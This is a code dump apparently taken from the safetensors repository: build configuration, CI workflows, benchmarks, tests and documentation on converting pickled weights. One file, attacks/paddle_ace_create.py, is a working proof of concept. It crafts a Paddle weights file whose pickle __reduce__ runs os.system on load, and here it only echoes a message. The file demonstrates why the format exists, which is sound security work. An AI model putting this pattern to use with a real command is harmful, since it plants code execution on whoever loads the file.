45 |
46 | ### Developing
47 |
48 | ```
49 | # inside ./safetensors/bindings/python
50 | pip install .[dev]
51 | ```
52 | Should be enough to install this library locally.
53 |
54 | ### Testing
55 |
56 | ```
57 | # inside ./safetensors/bindings/python
58 | pip install .[dev]
59 | pytest -sv tests/
60 | ```
61 |
--------------------------------------------------------------------------------
/bindings/python/setup.cfg:
--------------------------------------------------------------------------------
1 | [isort]
2 | default_section = FIRSTPARTY
3 | ensure_newline_before_comments = True
4 | force_grid_wrap = 0
5 | include_trailing_comma = True
6 | known_first_party = transformers
7 | known_third_party =
8 | absl
9 | conllu
10 | datasets
11 | elasticsearch
12 | fairseq
13 | faiss-cpu
14 | fastprogress
15 | fire
16 | fugashi
17 | git
18 | h5py
19 | matplotlib
20 | nltk
21 | numpy
22 | packaging
23 | pandas
24 | PIL
25 | psutil
26 | pytest
27 | pytorch_lightning
28 | rouge_score
29 | sacrebleu
30 | seqeval
31 | sklearn
32 | streamlit
33 | tensorboardX
34 | tensorflow
35 | tensorflow_datasets
36 | timeout_decorator
37 | torch
38 | torchaudio
39 | torchtext
40 | torchvision
41 | torch_xla
42 | tqdm
43 | paddlepaddle
44 |
45 | line_length = 119
46 | lines_after_imports = 2
47 | multi_line_output = 3
48 | use_parentheses = True
49 |
50 | [flake8]
51 | ignore = E203, E501, E741, W503, W605
52 | max-line-length = 119
53 |
54 | [tool:pytest]
55 | doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSIS
--------------------------------------------------------------------------------
/docs/source/convert-weights.md:
--------------------------------------------------------------------------------
1 | # Convert weights to safetensors
2 |
3 | PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensor` format, we recommend converting your weights to `.safetensors`.
4 |
5 | The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), given your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository.
6 |
7 |
8 |
9 | For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights.
10 |
11 | Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space.
12 |
13 |
14 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature-request.yml:
--------------------------------------------------------------------------------
1 | name: "\U0001F680 Feature request"
2 | description: Submit a proposal/request for a new safetensors feature
3 | labels: [ "feature" ]
4 | body:
5 | - type: textarea
6 | id: feature-request
7 | validations:
8 | required: true
9 | attributes:
10 | label: Feature request
11 | description: |
12 | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist.
13 |
14 | - type: textarea
15 | id: motivation
16 | validations:
17 | required: true
18 | attributes:
19 | label: Motivation
20 | description: |
21 | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too.
22 |
23 |
24 | - type: textarea
25 | id: contribution
26 | validations:
27 | required: true
28 | attributes:
29 | label: Your contribution
30 | description: |
31 | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the CONTRIBUTING.MD [readme](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md)
32 |
--------------------------------------------------------------------------------
/bindings/python/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples
2 |
3 | # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!)
4 | export PYTHONPATH = src
5 |
6 | check_dirs := tests py_src
7 |
8 | modified_only_fixup:
9 | $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs)))
10 | @if test -n "$(modified_py_files)"; then \
11 | echo "Checking/fixing $(modified_py_files)"; \
12 | black --preview $(modified_py_files); \
13 | isort $(modified_py_files); \
14 | flake8 $(modified_py_files); \
15 | else \
16 | echo "No library .py files were modified"; \
17 | fi
18 |
19 |
20 | quality:
21 | black --check --preview $(check_dirs)
22 | isort --check-only $(check_dirs)
23 | flake8 $(check_dirs)
24 | # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source
25 |
26 | style:
27 | black --preview $(check_dirs)
28 | isort $(check_dirs)
29 |
30 | # Super fast fix and check target that only works on relevant modified files since the branch was made
31 |
32 | fixup: modified_only_fixup
33 |
34 | test:
35 | python -m pytest -n auto --dist=loadfile -s -v ./tests/
36 |
--------------------------------------------------------------------------------
/safetensors/src/lib.rs:
--------------------------------------------------------------------------------
1 | #![deny(missing_docs)]
2 | #![doc = include_str!("../README.md")]
3 | #![cfg_attr(not(feature = "std"), no_std)]
4 | pub mod slice;
5 | pub mod tensor;
6 | /// serialize_to_file only valid in std
7 | #[cfg(feature = "std")]
8 | pub use tensor::serialize_to_file;
9 | pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View};
10 |
11 | #[cfg(not(feature = "std"))]
12 | #[macro_use]
13 | extern crate alloc;
14 |
15 | /// A facade around all the types we need from the `std`, `core`, and `alloc`
16 | /// crates. This avoids elaborate import wrangling having to happen in every
17 | /// module.
18 | mod lib {
19 | #[cfg(not(feature = "std"))]
20 | mod no_stds {
21 | pub use alloc::borrow::Cow;
22 | pub use alloc::string::{String, ToString};
23 | pub use alloc::vec::Vec;
24 | pub use hashbrown::HashMap;
25 | }
26 | #[cfg(feature = "std")]
27 | mod stds {
28 | pub use std::borrow::Cow;
29 | pub use std::collections::HashMap;
30 | pub use std::string::{String, ToString};
31 | pub use std::vec::Vec;
32 | }
33 | /// choose std or no_std to export by feature flag
34 | #[cfg(not(feature = "std"))]
35 | pub use no_stds::*;
36 | #[cfg(feature = "std")]
37 | pub use stds::*;
38 | }
39 |
--------------------------------------------------------------------------------
/Dockerfile.s390x.test:
--------------------------------------------------------------------------------
1 | FROM s390x/python
2 | RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \
3 | && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \
4 | && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh
5 | RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y
6 | RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y
7 | WORKDIR /safetensors/
8 | RUN /root/miniconda3/bin/pip install -U pip pytest
9 | # RUN /root/miniconda3/bin/pip install -U huggingface_hub
10 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")'
11 | COPY . .
12 | SHELL ["/bin/bash", "-c"]
13 | WORKDIR /safetensors/bindings/python/
14 | RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e .
15 | # Work around error probably caused by https://sourceware.org/bugzilla/show_bug.cgi?id=32653
16 | # E ImportError: libopenblas.so.0: cannot enable executable stack as shared object requires: Invalid argument
17 | ENV GLIBC_TUNABLES=glibc.rtld.execstack=2
18 | RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py
19 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10'
20 | ENTRYPOINT /bin/bash
21 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | repos:
2 | - repo: https://github.com/Narsil/pre-commit-rust
3 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c
4 | hooks:
5 | - id: fmt
6 | name: "Rust (fmt)"
7 | args: ["--manifest-path", "safetensors/Cargo.toml", "--"]
8 | - id: clippy
9 | name: "Rust (clippy)"
10 | args:
11 | [
12 | "--manifest-path",
13 | "safetensors/Cargo.toml",
14 | "--all-targets",
15 | "--",
16 | "-Dwarnings",
17 | ]
18 | - repo: https://github.com/Narsil/pre-commit-rust
19 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c
20 | hooks:
21 | - id: fmt
22 | name: "Python (fmt)"
23 | args: ["--manifest-path", "bindings/python/Cargo.toml", "--"]
24 | - id: clippy
25 | name: "Python (clippy)"
26 | args:
27 | [
28 | "--manifest-path",
29 | "bindings/python/Cargo.toml",
30 | "--all-targets",
31 | "--",
32 | "-Dwarnings",
33 | ]
34 | - repo: https://github.com/astral-sh/ruff-pre-commit
35 | # Ruff version.
36 | rev: v0.12.8
37 | hooks:
38 | # Run the linter.
39 | - id: ruff-check
40 | # Run the formatter.
41 | - id: ruff-format
42 | - repo: https://github.com/astral-sh/ruff-pre-commit
43 | # Ruff version.
44 | rev: v0.11.11
45 | hooks:
46 | # Run the linter.
47 | - id: ruff-check
48 | # Run the formatter.
49 | - id: ruff-format
50 |
--------------------------------------------------------------------------------
/safetensors/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors"
3 | version = "0.7.0-dev.0"
4 | edition = "2021"
5 | rust-version = "1.80"
6 | homepage = "https://github.com/huggingface/safetensors"
7 | repository = "https://github.com/huggingface/safetensors"
8 | documentation = "https://docs.rs/safetensors/"
9 | license = "Apache-2.0"
10 | keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"]
11 | readme = "./README.md"
12 | description = """
13 | Provides functions to read and write safetensors which aim to be safer than
14 | their PyTorch counterpart.
15 | The format is 8 bytes which is an unsized int, being the size of a JSON header,
16 | the JSON header refers the `dtype` the `shape` and `data_offsets` which are the offsets
17 | for the values in the rest of the file.
18 | """
19 | exclude = ["rust-toolchain", "target/*", "Cargo.lock"]
20 |
21 |
22 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
23 |
24 | [dependencies]
25 | serde = { version = "1.0", default-features = false, features = [
26 | "derive",
27 | "alloc",
28 | ] }
29 | serde_json = { version = "1.0", default-features = false, features = ["alloc"] }
30 | hashbrown = { version = "0.16", features = ["serde"] }
31 |
32 | [target.'cfg(target_os = "macos")'.dependencies]
33 | libc = "0.2"
34 |
35 | [dev-dependencies]
36 | criterion = "0.6"
37 | memmap2 = "0.9"
38 | proptest = "1.7"
39 |
40 | [features]
41 | default = ["std"]
42 | std = ["serde/default", "serde_json/default"]
43 | # Kept for backward compatibility - no-op since alloc is always available
44 | alloc = []
45 |
46 | [[bench]]
47 | name = "benchmark"
48 | harness = false
49 |
--------------------------------------------------------------------------------
/bindings/python/convert_all.py:
--------------------------------------------------------------------------------
1 | """Simple utility tool to convert automatically most downloaded models"""
2 |
3 | from convert import AlreadyExists, convert
4 | from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments
5 | from transformers import AutoConfig
6 |
7 |
8 | if __name__ == "__main__":
9 | api = HfApi()
10 | args = ModelSearchArguments()
11 |
12 | total = 50
13 | models = list(
14 | api.list_models(
15 | filter=ModelFilter(library=args.library.Transformers),
16 | sort="downloads",
17 | direction=-1,
18 | )
19 | )[:total]
20 |
21 | correct = 0
22 | errors = set()
23 | for model in models:
24 | model = api.model_info(model.id, files_metadata=True)
25 | size = None
26 | for sibling in model.siblings:
27 | if sibling.rfilename == "pytorch_model.bin":
28 | size = sibling.size
29 | if size is None or size > 2_000_000_000:
30 | print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})")
31 | continue
32 |
33 | model_id = model.modelId
34 | print(f"[{model.downloads}] {model.modelId}")
35 | try:
36 | convert(api, model_id)
37 | correct += 1
38 | except AlreadyExists as e:
39 | correct += 1
40 | print(e)
41 | except Exception as e:
42 | config = AutoConfig.from_pretrained(model_id)
43 | errors.add(config.__class__.__name__)
44 | print(e)
45 |
46 | print(f"Errors: {errors}")
47 | print(f"File size is difference {len(errors)}")
48 | print(f"Correct rate {correct}/{total} ({correct / total * 100:.2f}%)")
49 |
--------------------------------------------------------------------------------
/attacks/paddle_ace_create.py:
--------------------------------------------------------------------------------
1 | import paddle
2 | import numpy as np
3 | from collections import Iterable, OrderedDict
4 |
5 | def _parse_every_object(obj, condition_func, convert_func):
6 | if condition_func(obj):
7 | return convert_func(obj)
8 | elif isinstance(obj, (dict, OrderedDict, list)):
9 | if isinstance(obj, list):
10 | keys = range(len(obj))
11 | else:
12 | keys = list(obj.keys())
13 | for key in keys:
14 | if condition_func(obj[key]):
15 | obj[key] = convert_func(obj[key])
16 | else:
17 | obj[key] = _parse_every_object(
18 | obj[key], condition_func, convert_func
19 | )
20 | return obj
21 | elif isinstance(obj, tuple):
22 | return tuple(
23 | _parse_every_object(list(obj), condition_func, convert_func)
24 | )
25 | elif isinstance(obj, set):
26 | object(list(obj), condition_func, convert_func)
27 | else:
28 | return obj
29 |
30 | # hack _parse_every_object method
31 | paddle.framework.io._parse_every_object = _parse_every_object
32 |
33 | class BadDict(dict):
34 | def __init__(self, src: str, **kwargs):
35 | super().__init__(**kwargs)
36 | self.src = src
37 |
38 | def __reduce__(self):
39 | return (
40 | eval,
41 | (f"os.system('{self.src}') or dict()",),
42 | None,
43 | None,
44 | iter(self.items()),
45 | )
46 |
47 | paddle.save(
48 | [BadDict(
49 | 'echo "pwned your computer, I can do anything I want."',
50 | **{"weight": paddle.zeros((2, 2))},
51 | )],
52 | "paddle_ace.pdparams",
53 | )
54 |
--------------------------------------------------------------------------------
/docs/safetensors.schema.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://json-schema.org/draft/2020-12/schema",
3 | "title": "safetensors format header",
4 | "description": "Describes the structure of all the tensors and their metadata",
5 | "$defs": {
6 | "size_t": {
7 | "type": "integer",
8 | "minimum": 0,
9 | "maximum": 281474976710655,
10 | "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)"
11 | },
12 | "Tensor": {
13 | "title": "Tensor",
14 | "description": "Describes the structure of one tensor",
15 | "type": "object",
16 | "additionalProperties": false,
17 | "properties": {
18 | "dtype": {
19 | "type": "string",
20 | "pattern": "([UIF])(8|16|32|64|128|256)",
21 | "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits."
22 | },
23 | "shape": {
24 | "type": "array",
25 | "items": {
26 | "$ref": "#/$defs/size_t",
27 | "description": "Size of each dimension."
28 | }
29 | },
30 | "data_offsets": {
31 | "type": "array",
32 | "prefixItems": [
33 | {
34 | "$ref": "#/$defs/size_t",
35 | "description": "Start offset of the array. "
36 | },
37 | {
38 | "$ref": "#/$defs/size_t",
39 | "description": "End offset of the array. Equal to the previous item + array size."
40 | }
41 | ]
42 | }
43 | },
44 | "required": [
45 | "data_offsets",
46 | "dtype",
47 | "shape"
48 | ]
49 | },
50 | "Metadata": {
51 | "type": "object",
52 | "additionalProperties": {"type": "string"},
53 | "title": "Metadata"
54 | }
55 | },
56 | "type": "object",
57 | "properties": {
58 | "__metadata__": {
59 | "description": "Arbitrary metadata",
60 | "$ref": "#/$defs/Metadata"
61 | }
62 | },
63 | "additionalProperties": {
64 | "$ref": "#/$defs/Tensor"
65 | }
66 | }
67 |
--------------------------------------------------------------------------------
/.github/workflows/rust.yml:
--------------------------------------------------------------------------------
1 | name: Rust
2 |
3 | on:
4 | pull_request:
5 |
6 | jobs:
7 | build:
8 | runs-on: ${{ matrix.os }}
9 | strategy:
10 | matrix:
11 | os: [ubuntu-latest, windows-latest, macOS-latest]
12 | toolchain: [stable]
13 | include:
14 | - os: ubuntu-latest
15 | toolchain: "1.74"
16 | defaults:
17 | run:
18 | working-directory: ./safetensors
19 |
20 | steps:
21 | - uses: actions/checkout@v6
22 |
23 | - name: Install Rust Stable
24 | uses: dtolnay/rust-toolchain@stable
25 | with:
26 | components: rustfmt, clippy, llvm-tools-preview
27 | override: true
28 |
29 | - uses: Swatinem/rust-cache@v2
30 |
31 | - name: Install cargo-audit
32 | run: cargo install cargo-audit
33 |
34 | - name: Install cargo-llvm-cov for Ubuntu
35 | if: matrix.os == 'ubuntu-latest'
36 | run: cargo install cargo-llvm-cov
37 |
38 | - name: Build
39 | run: cargo build --all-targets --verbose
40 |
41 | - name: Lint with Clippy
42 | run: cargo clippy --all-targets -- -D warnings
43 |
44 | - name: Run Tests
45 | run: cargo test --verbose
46 |
47 | - name: Run No-STD Tests
48 | run: cargo test --no-default-features --verbose
49 |
50 | - name: Run Audit
51 | # RUSTSEC-2021-0145 is criterion so only within benchmarks
52 | run: cargo audit -D warnings --ignore RUSTSEC-2021-0145
53 |
54 | - name: Coverage report
55 | if: matrix.os == 'ubuntu-latest'
56 | run: cargo llvm-cov --release --lcov --output-path lcov.info
57 |
58 | # - name: Upload to codecov.io
59 | # if: matrix.os == 'ubuntu-latest'
60 | # uses: codecov/codecov-action@v3
61 | # with:
62 | # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos
63 | # working-directory: ./safetensors
64 | # fail_ci_if_error: true
65 |
--------------------------------------------------------------------------------
/safetensors/benches/benchmark.rs:
--------------------------------------------------------------------------------
1 | use criterion::{criterion_group, criterion_main, Criterion};
2 | use safetensors::tensor::*;
3 | use std::collections::HashMap;
4 | use std::hint::black_box;
5 |
6 | // Returns a sample data of size 2_MB
7 | fn get_sample_data() -> (Vec, Vec, Dtype) {
8 | let shape = vec![1000, 500];
9 | let dtype = Dtype::F32;
10 | let nbits = shape.iter().product::() * dtype.bitsize();
11 | assert!(nbits % 8 == 0);
12 | let n: usize = nbits / 8; // 4
13 | let data = vec![0; n];
14 |
15 | (data, shape, dtype)
16 | }
17 |
18 | pub fn bench_serialize(c: &mut Criterion) {
19 | let (data, shape, dtype) = get_sample_data();
20 | let n_layers = 5;
21 |
22 | let mut metadata: HashMap = HashMap::new();
23 | // 2_MB x 5 = 10_MB
24 | for i in 0..n_layers {
25 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
26 | metadata.insert(format!("weight{i}"), tensor);
27 | }
28 |
29 | c.bench_function("Serialize 10_MB", |b| {
30 | b.iter(|| {
31 | let _serialized = serialize(black_box(&metadata), black_box(None));
32 | })
33 | });
34 | }
35 |
36 | pub fn bench_deserialize(c: &mut Criterion) {
37 | let (data, shape, dtype) = get_sample_data();
38 | let n_layers = 5;
39 |
40 | let mut metadata: HashMap = HashMap::new();
41 | // 2_MB x 5 = 10_MB
42 | for i in 0..n_layers {
43 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
44 | metadata.insert(format!("weight{i}"), tensor);
45 | }
46 |
47 | let out = serialize(&metadata, None).unwrap();
48 |
49 | c.bench_function("Deserialize 10_MB", |b| {
50 | b.iter(|| {
51 | let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap();
52 | })
53 | });
54 | }
55 |
56 | criterion_group!(bench_ser, bench_serialize);
57 | criterion_group!(bench_de, bench_deserialize);
58 | criterion_main!(bench_ser, bench_de);
59 |
--------------------------------------------------------------------------------
/.github/workflows/python-bench.yml:
--------------------------------------------------------------------------------
1 | name: Simple benchmarks
2 | on:
3 | push:
4 | branches:
5 | - main
6 | pull_request:
7 |
8 |
9 | permissions:
10 | # deployments permission to deploy GitHub pages website
11 | deployments: write
12 | # contents permission to update benchmark contents in gh-pages branch
13 | contents: write
14 |
15 | jobs:
16 | benchmark:
17 | name: Performance regression check
18 | runs-on: ubuntu-latest
19 | steps:
20 | - uses: actions/checkout@v6
21 | - name: Install Rust
22 | uses: dtolnay/rust-toolchain@stable
23 | with:
24 | components: rustfmt, clippy
25 |
26 | - name: Install Python
27 | uses: actions/setup-python@v6
28 | with:
29 | python-version: "3.12"
30 | architecture: "x64"
31 |
32 | - name: Install
33 | working-directory: ./bindings/python
34 | run: |
35 | pip install -U pip uv
36 | uv sync --extra dev
37 |
38 | - name: Run tests
39 | working-directory: ./bindings/python
40 | run: |
41 | cargo test
42 | uv run pytest --benchmark-json output.json benches/
43 | # Download previous benchmark result from cache (if exists)
44 | - name: Download previous benchmark data
45 | uses: actions/cache@v5
46 | with:
47 | path: ./cache
48 | key: ${{ runner.os }}-benchmark
49 | # Run `github-action-benchmark` action
50 | - name: Store benchmark result
51 | uses: benchmark-action/github-action-benchmark@v1
52 | with:
53 | # What benchmark tool the output.txt came from
54 | tool: 'pytest'
55 | # Where the output from the benchmark tool is stored
56 | output-file-path: ./bindings/python/output.json
57 | github-token: ${{ secrets.GITHUB_TOKEN }}
58 | # Push and deploy GitHub pages branch automatically
59 | auto-push: ${{ github.event.pull_request.head.repo.fork == false }}
60 | comment-on-alert: true
61 | # Mention @rhysd in the commit comment
62 | alert-comment-cc-users: '@danieldk,@McPatate'
63 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_paddle.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import numpy as np
5 |
6 | import paddle
7 | from safetensors.paddle import load_file, save_file
8 |
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = paddle.zeros((50257, 768))
13 | tensors["wpe"] = paddle.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,))
22 | tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,))
23 | tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,))
28 | tensors["ln_f.weight"] = paddle.zeros((768,))
29 | tensors["ln_f.bias"] = paddle.zeros((768,))
30 | return tensors
31 |
32 |
33 | def test_paddle_paddle_load(benchmark):
34 | # benchmark something
35 | weights = create_gpt2(12)
36 | with tempfile.NamedTemporaryFile(delete=False) as f:
37 | paddle.save(weights, f.name)
38 | result = benchmark(paddle.load, f.name)
39 | os.unlink(f.name)
40 |
41 | for k, v in weights.items():
42 | tv = result[k]
43 | assert paddle.allclose(v, tv)
44 |
45 |
46 | def test_paddle_sf_load(benchmark):
47 | # benchmark something
48 | weights = create_gpt2(12)
49 | with tempfile.NamedTemporaryFile(delete=False) as f:
50 | save_file(weights, f.name)
51 | result = benchmark(load_file, f.name)
52 | os.unlink(f.name)
53 |
54 | for k, v in weights.items():
55 | tv = result[k]
56 | assert np.allclose(v, tv)
57 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | import tempfile
3 |
4 | import jax.numpy as jnp
5 | from flax.serialization import msgpack_restore, msgpack_serialize
6 | from safetensors.flax import load_file, save_file
7 |
8 |
9 | def create_gpt2(n_layers: int):
10 | tensors = {}
11 | tensors["wte"] = jnp.zeros((50257, 768))
12 | tensors["wpe"] = jnp.zeros((1024, 768))
13 | for i in range(n_layers):
14 | tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,))
15 | tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,))
16 | tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024))
17 | tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304))
18 | tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304))
19 | tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768))
20 | tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768))
21 | tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768))
22 | tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768))
23 | tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072))
24 | tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072))
25 | tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768))
26 | tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768))
27 | tensors["ln_f.weight"] = jnp.zeros((768))
28 | tensors["ln_f.bias"] = jnp.zeros((768))
29 | return tensors
30 |
31 |
32 | def load(filename):
33 | with open(filename, "rb") as f:
34 | data = f.read()
35 | flax_weights = msgpack_restore(data)
36 | return flax_weights
37 |
38 |
39 | def test_flax_flax_load(benchmark):
40 | # benchmark something
41 | weights = create_gpt2(12)
42 | with tempfile.NamedTemporaryFile(delete=False) as f:
43 | serialized = msgpack_serialize(weights)
44 | f.write(serialized)
45 | result = benchmark(load, f.name)
46 | os.unlink(f.name)
47 |
48 | for k, v in weights.items():
49 | tv = result[k]
50 | assert jnp.allclose(v, tv)
51 |
52 |
53 | def test_flax_sf_load(benchmark):
54 | # benchmark something
55 | weights = create_gpt2(12)
56 | with tempfile.NamedTemporaryFile(delete=False) as f:
57 | save_file(weights, f.name)
58 | result = benchmark(load_file, f.name)
59 | os.unlink(f.name)
60 |
61 | for k, v in weights.items():
62 | tv = result[k]
63 | assert jnp.allclose(v, tv)
64 |
--------------------------------------------------------------------------------
/bindings/python/benches/test_mlx.py:
--------------------------------------------------------------------------------
1 | import os
2 | import platform
3 | import tempfile
4 |
5 |
6 | if platform.system() == "Darwin":
7 | import mlx.core as mx
8 | from safetensors.mlx import load_file, save_file
9 |
10 | def create_gpt2(n_layers: int):
11 | tensors = {}
12 | tensors["wte"] = mx.zeros((50257, 768))
13 | tensors["wpe"] = mx.zeros((1024, 768))
14 | for i in range(n_layers):
15 | tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,))
16 | tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,))
17 | tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024))
18 | tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304))
19 | tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304))
20 | tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768))
21 | tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768))
22 | tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768))
23 | tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768))
24 | tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072))
25 | tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072))
26 | tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768))
27 | tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768))
28 | tensors["ln_f.weight"] = mx.zeros((768))
29 | tensors["ln_f.bias"] = mx.zeros((768))
30 | return tensors
31 |
32 | def load(filename):
33 | return mx.load(filename)
34 |
35 | def test_mlx_mlx_load(benchmark):
36 | # benchmark something
37 | weights = create_gpt2(12)
38 | with tempfile.NamedTemporaryFile(delete=False) as f:
39 | filename = f"{f.name}.npz"
40 | mx.savez(filename, **weights)
41 | result = benchmark(load, filename)
42 | os.unlink(f.name)
43 |
44 | for k, v in weights.items():
45 | tv = result[k]
46 | assert mx.allclose(v, tv)
47 |
48 | def test_mlx_sf_load(benchmark):
49 | # benchmark something
50 | weights = create_gpt2(12)
51 | with tempfile.NamedTemporaryFile(delete=False) as f:
52 | save_file(weights, f.name)
53 | result = benchmark(load_file, f.name)
54 | os.unlink(f.name)
55 |
56 | for k, v in weights.items():
57 | tv = result[k]
58 | assert mx.allclose(v, tv)
59 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_handle.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | import numpy as np
4 |
5 | from safetensors import _safe_open_handle
6 | from safetensors.numpy import save_file, save
7 |
8 |
9 | class ReadmeTestCase(unittest.TestCase):
10 | def assertTensorEqual(self, tensors1, tensors2, equality_fn):
11 | self.assertEqual(tensors1.keys(), tensors2.keys(), "tensor keys don't match")
12 |
13 | for k, v1 in tensors1.items():
14 | v2 = tensors2[k]
15 |
16 | self.assertTrue(equality_fn(v1, v2), f"{k} tensors are different")
17 |
18 | def test_numpy_example(self):
19 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)}
20 |
21 | save_file(tensors, "./out_np.safetensors")
22 |
23 | # Now loading
24 | loaded = {}
25 | with open("./out_np.safetensors", "r") as f:
26 | with _safe_open_handle(f, framework="np", device="cpu") as g:
27 | for key in g.keys():
28 | loaded[key] = g.get_tensor(key)
29 | self.assertTensorEqual(tensors, loaded, np.allclose)
30 |
31 | def test_fsspec(self):
32 | import fsspec
33 |
34 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)}
35 |
36 | fs = fsspec.filesystem("file")
37 | byts = save(tensors)
38 | with fs.open("fs.safetensors", "wb") as f:
39 | f.write(byts)
40 | # Now loading
41 | loaded = {}
42 | with fs.open("fs.safetensors", "rb") as f:
43 | with _safe_open_handle(f, framework="np", device="cpu") as g:
44 | for key in g.keys():
45 | loaded[key] = g.get_tensor(key)
46 | self.assertTensorEqual(tensors, loaded, np.allclose)
47 |
48 | @unittest.skip("Will not work without s3 access")
49 | def test_fsspec_s3(self):
50 | import s3fs
51 |
52 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)}
53 |
54 | s3 = s3fs.S3FileSystem(anon=True)
55 | byts = save(tensors)
